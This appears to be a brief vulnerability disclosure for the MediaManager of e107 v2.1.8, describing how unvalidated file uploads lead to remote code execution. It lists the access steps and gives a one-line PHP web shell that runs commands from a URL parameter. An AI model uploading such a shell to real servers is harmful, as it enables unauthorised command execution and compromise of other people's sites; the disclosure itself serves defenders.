MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.
Login to the admin page (
/e107_admin/admin.php) and access MediaManager.
<?php system($_GET['q']) ?>